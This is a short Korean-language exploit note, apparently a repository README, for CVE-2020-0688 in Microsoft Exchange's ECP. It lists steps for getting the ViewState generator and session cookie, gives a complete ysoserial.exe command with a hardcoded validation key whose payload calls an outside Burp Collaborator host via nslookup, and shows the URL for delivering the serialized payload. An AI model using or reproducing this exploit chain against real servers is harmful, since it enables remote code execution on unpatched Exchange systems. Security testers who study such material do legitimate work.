
cve-2020-0688
cve-2020-0688
이메일 주소 권한이 있는 사용자로 로그인하는 것은 문제가 되지 않습니다.
획득 - 페이지 소스에서 __VIEWSTATEGENERATOR 가져오기
획득 - viewstateuserkey 값에 대한 ASP.NET_SessionId 쿠키 값 가져오기
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
다음으로 이동:
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
Exploit.py는 테스트되지 않았으며, 실행하고 실험할 데모 시스템이 필요합니다.